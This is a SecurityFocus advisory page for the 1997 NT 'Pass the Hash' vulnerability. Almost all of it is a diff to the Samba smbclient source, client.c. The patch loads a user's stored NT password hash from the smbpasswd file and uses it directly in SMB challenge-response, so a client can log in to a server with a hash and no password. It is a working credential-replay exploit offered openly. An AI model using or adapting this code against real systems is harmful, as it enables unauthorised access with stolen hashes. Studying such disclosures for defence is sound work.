NT "Pass the Hash" with Modified SMB Client Vulnerability

*** orig_client.c Tue Apr 8 17:27:29 1997
--- client.c Tue Apr 8 20:57:43 1997
***************
*** 3020,3026 ****
{-1,NULL}
};

-
/****************************************************************************
send a login command
****************************************************************************/
--- 3020,3025 ----
***************
*** 3039,3044 ****
--- 3038,3061 ----
int numprots;
int tries=0;

+ #ifdef USESMBPASSWDFILE
+ /*TODO check for valid password and uid = getuid */
+ BOOL got_encpass;
+ struct passwd *pwd;
+ struct smb_passwd *smb_pass;
+ unsigned char p21[21];
+
+ memset(p21, 0, sizeof p21);
+ pwd = getpwuid(getuid());
+ if (pwd && (smb_pass = get_smbpwnam(pwd->pw_name)))
+ {
+ strcpy(password, "not empty");
+ got_pass = got_encpass = True;
+ memcpy(p21, smb_pass->smb_passwd, 16);
+ }
+ setuid(getuid());
+ #endif
+
if (was_null)
{
inbuf = (char *)malloc(BUFFER_SIZE + SAFETY_MARGIN);
***************
*** 3189,3194 ****
--- 3205,3215 ----
if (doencrypt && *pass) {
DEBUG(3,("Using encrypted passwords\n"));
passlen = 24;
+
+ #ifdef USESMBPASSWDFILE
+ if (got_encpass) E_P24(p21,cryptkey,pword);
+ else
+ #endif
SMBencrypt(pass,cryptkey,pword);
}
#else
***************
*** 3252,3257 ****
--- 3273,3281 ----
(CVAL(inbuf,smb_rcls) == ERRSRV &&
SVAL(inbuf,smb_err) == ERRbadpw)))
{
+ #ifdef USESMBPASSWDFILE
+ got_encpass =
+ #endif
got_pass = False;
DEBUG(3,("resending login\n"));
goto get_pass;


 

Privacy Statement
Copyright 2010, SecurityFocus